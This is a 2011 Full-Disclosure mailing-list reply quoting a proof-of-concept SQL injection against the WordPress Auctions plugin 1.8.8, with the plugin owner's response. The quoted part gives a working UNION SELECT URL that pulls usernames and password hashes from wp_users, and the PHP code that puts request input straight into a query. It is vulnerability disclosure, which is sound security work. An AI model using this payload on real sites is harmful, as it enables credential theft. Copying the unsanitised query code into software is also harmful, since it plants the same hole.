Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection

[Henri Salo <henri@xxxxxxx>]

On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote:
> On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:
> > # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection
> > Vulnerability
> > # Date: 2011-09-09
> > # Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org>
> > @AlligatorTeam
> > # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> > # Version: 1.8.8 (tested)
> > 
> > ---------------
> > PoC
> > ---------------
> > 
> > URL:
> > http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> > 
> > ---------------
> > Vulnerable code
> > ---------------
> > ...
> > elseif($_GET["wpa_action"] == "edit"):
> >     $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> > ...
> > elseif($_GET["wpa_action"] == "relist"):
> >     $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> > ...
> > $resultList = $wpdb->get_row($strSQL);
> > ...
> 
> Did you report this issue to the author of the plugin?
> 
> Best regards,
> Henri Salo

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that 
those parameters aren't sanitised (which we will address immediately). It's 
work pointing out though, that this is an administration module (protected by 
WordPress's user permissions); rather than one that can be access anonymously."

Follow-up: 
http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/